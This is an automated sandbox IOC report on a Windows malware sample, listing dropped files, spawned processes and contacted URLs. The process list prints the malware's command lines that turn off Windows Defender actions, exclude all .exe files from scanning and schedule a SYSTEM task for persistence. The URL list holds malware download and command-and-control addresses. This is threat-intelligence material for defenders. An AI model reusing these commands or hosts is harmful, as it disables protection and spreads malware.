IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
CSV text
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1]
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\setup[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1]
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Channel2[1].exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\CheckTool[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\stories[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\univ[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\is-5ANFC.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\is-75FQC.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\is-O04L0.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\libeay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\libssl-1_1.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Play Glock\ssleay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\uninstall\is-R79QI.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Play Glock\uninstall\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Bunifu_UI_v1.5.3.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll
PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_RegDLL.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_iscrypt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\service123.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tyq3dazbB0crObgK_14e4c4bdfbf874b512fc3170f3f83834d8ec981d_07c48f9b_14f03704-c0a9-40eb-964a-668825b036fb\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tyq3dazbB0crObgK_14e4c4bdfbf874b512fc3170f3f83834d8ec981d_07c48f9b_387c352d-719b-421b-b3c1-1bdb15d42acc\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tyq3dazbB0crObgK_14e4c4bdfbf874b512fc3170f3f83834d8ec981d_07c48f9b_734b19a0-9dc6-4428-8efd-3bfa4eb94daa\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tyq3dazbB0crObgK_14e4c4bdfbf874b512fc3170f3f83834d8ec981d_07c48f9b_90b25c10-298e-40be-9959-3b69a56e67fc\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tyq3dazbB0crObgK_14e4c4bdfbf874b512fc3170f3f83834d8ec981d_07c48f9b_e297006f-820d-4663-b3a1-ecbcf3c49020\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B9.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER10E9.tmp.txt
data
modified
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3335.tmp.dmp
Mini DuMP crash report, 14 streams, Sat Sep 28 22:53:36 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3818.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3904.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3911.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3970.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C4D.tmp.dmp
Mini DuMP crash report, 14 streams, Sat Sep 28 22:53:38 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D0A.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D59.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D69.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E54.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER415E.tmp.dmp
Mini DuMP crash report, 14 streams, Sat Sep 28 22:53:39 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER449B.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER450A.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER45A8.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4674.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER497C.tmp.dmp
Mini DuMP crash report, 14 streams, Sat Sep 28 22:53:41 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A97.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AF5.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B48.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C81.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER50FE.tmp.dmp
Mini DuMP crash report, 14 streams, Sat Sep 28 22:53:43 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER51DA.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5248.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER525E.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER530B.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER552F.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER558E.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5744.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER583F.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8FE.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB95C.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1F4.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2DF.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE94.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDD.tmp.csv
data
dropped
C:\ProgramData\ed928it47.dat
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\ProgramData\ed928rc47.dat
data
dropped
C:\ProgramData\ed928resa.dat
ASCII text, with no line terminators
dropped
C:\ProgramData\ed928resb.dat
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\download[1].htm
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\key[1].htm
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\fuckingdllENCR[1].dll
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\name[1].htm
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\add[1].htm
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\download[1].htm
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Play Glock\Qt5OpenGL.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\AppData\Local\Play Glock\is-86R9G.tmp
PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\AppData\Local\Play Glock\is-AQT5U.tmp
data
dropped
C:\Users\user\AppData\Local\Play Glock\is-IKU3H.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Play Glock\is-IVTOI.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Play Glock\msvcp71.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Play Glock\msvcr71.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Play Glock\uninstall\unins000.dat
InnoSetup Log Play Glock, version 0x30, 4401 bytes, 675052\user, "C:\Users\user\AppData\Local\Play Glock"
dropped
C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\__data__\config.txt
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5vv5z4j.t2x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fro4flp3.50u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_my22li2s.0uu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvosx4kc.irw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_shfoldr.dll
PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\Desktop\Cleaner.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sat Sep 28 21:54:19 2024, mtime=Sat Sep 28 21:54:19 2024, atime=Sat Sep 28 21:54:19 2024, length=1502720, window=hide
dropped
C:\Users\user\Documents\iofolko5\PXmC5_sqNQv8jWyecSd7ycvv.exe
HTML document, ASCII text
dropped
C:\Users\user\Documents\iofolko5\VUi4VlAeU5mHTySwb10PMAu9.exe
HTML document, ASCII text
dropped
C:\Windows\Tasks\bMvfdBTccYfZYKRCwN.job
data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
There are 97 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe
C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe
malicious
C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe
C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe
malicious
C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe
C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe
malicious
C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe
C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe
malicious
C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe
C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe
malicious
C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe
.\Install.exe
malicious
C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe
"C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe" -i
malicious
C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe
.\Install.exe /dXVdidiCT "385121" /S
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
malicious
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
malicious
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
malicious
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
malicious
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
malicious
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
malicious
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
malicious
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp
"C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp" /SL5="$70060,2863082,54272,C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
There are 41 hidden processes, click here to show them.

URLs

Name
IP
Malicious
reinforcenh.shop
malicious
stogeneratmns.shop
malicious
ejrsoyz.ua8a
malicious
ghostreedmnu.shop
malicious
http://ejrsoyz.ua/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c444db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf814c6eb959d3e
185.208.158.248
malicious
01fivevh5pt.top
malicious
https://iplog.co/1S3fd7
188.114.96.3
malicious
fragnantbui.shop
malicious
offensivedzvju.shop
malicious
http://ejrsoyz.ua/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113
185.208.158.248
malicious
drawzhotdog.shop
malicious
vozmeatillu.shop
malicious
analforeverlovyu.top
malicious
https://www.cloudflare.com/learning/access-management/phishing-attack/
unknown
http://45.91.200.135/api/wp-admin.php3
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://gcc.gnu.org/bugs/):
unknown
https://duckduckgo.com/ac/?q=
unknown
http://80.66.75.114/files/download
80.66.75.114
http://marafon.in/dergrherg/setup1.exexe
unknown
https://cdn.discordapp.com/6
unknown
http://185.208.158.248/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
unknown
http://45.91.200.135:80/api/wp-admin.phpU
unknown
http://103.130.147.211/Files/Silencer.exe
103.130.147.211
https://api64.ipify.org:443/?format=json
unknown
http://45.91.200.135/api/wp-admin.phpH
unknown
http://45.91.200.135:80/api/wp-admin.phpd
unknown
http://80.66.75.114/namel
unknown
http://194.58.114.223/d/385121%
unknown
https://ipinfo.io:443/widget/demo/8.46.123.33Z
unknown
http://103.130.147.211/Files/CheckTool.exe
103.130.147.211
http://185.208.158.248/-
unknown
http://fivevh5pt.top/
unknown
http://194.58.114.223/d/385121
194.58.114.223
http://45.91.200.135/api/wp-admin.phprN
unknown
http://45.91.200.135/l
unknown
https://api.sandbox.midtrans.comcrypto/aes:
unknown
http://103.130.147.211/Files/CheckTool.exeC:
unknown
http://www.certum.pl/CPS0
unknown
http://103.130.147.211/Files/CheckTool.exeK
unknown
http://www.innosetup.com/
unknown
https://ghostreedmnu.shop/
unknown
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBF
unknown
http://194.58.114.223/
unknown
http://80.66.75.114/dll/key
80.66.75.114
https://ghostreedmnu.shop/m
unknown
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBI
unknown
http://194.58.114.223/d/385121C:
unknown
http://crl.certum.pl/ctnca.crl0k
unknown
http://103.130.147.211/Files/Channel2.exeDBK7bm
unknown
http://185.208.158.248/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
unknown
https://www.ecosia.org/newtab/
unknown
https://www.cloudflare.com/5xx-error-landing
unknown
http://103.130.147.211/Files/Channel2.exel
unknown
https://iplog.co/%M
unknown
http://80.66.75.114/soft/downloadKR
unknown
https://ipinfo.io/
unknown
http://45.91.200.135:80/api/wp-admin.php
unknown
http://45.91.200.135:80/api/wp-ping.php
unknown
https://g-cleanit.hk
unknown
https://ipinfo.io/(
unknown
http://103.130.147.211/Files/Silencer.exe/
unknown
https://ipinfo.io/https://ipgeolocation.io/::
unknown
http://176.113.115.95/thebig/stories.exe
176.113.115.95
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB
80.66.75.114
http://45.91.200.135/api/wp-ping.php
unknown
https://iplog.co/1S3fd7&
unknown
http://45.91.200.135/api/wp-ping.phpU
unknown
http://repository.certum.pl/cscasha2.cer0
unknown
https://api64.ipify.org/
unknown
http://103.130.147.211/Files/Silencer.exeC:
unknown
https://api64.ipify.org/?format=json
173.231.16.77
http://103.130.147.211/Files/Channel2.exeC:
unknown
https://cdn.discordapp.com/
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://80.66.75.114/name
80.66.75.114
https://api.midtrans.comGetUserDefaultLocaleNameinvalid
unknown
http://103.130.147.211/Files/tac.exe
103.130.147.211
http://80.66.75.114/dl?name=mixninelVz0BoyeRjU78
unknown
http://www.openssl.org/support/faq.html
unknown
http://45.91.200.135/api/wp-admin.php
unknown
https://ipgeolocation.io/
unknown
http://103.130.147.211/Files/tac.exeC:
unknown
http://80.66.75.114/dl?name=mixnineC:
unknown
https://iplog.co/
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
http://marafon.in/dergrherg/setup1.exeC:
unknown
https://ipinfo.io/widget/demo/8.46.123.33
34.117.59.81
http://80.66.75.114/dll/download
80.66.75.114
http://45.91.200.135/
unknown
https://serviceupdate32.com/update
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://subca.ocsp-certum.com01
unknown
http://45.91.200.135/api/wp-ping.phpA
unknown
https://iplog.co/p
unknown
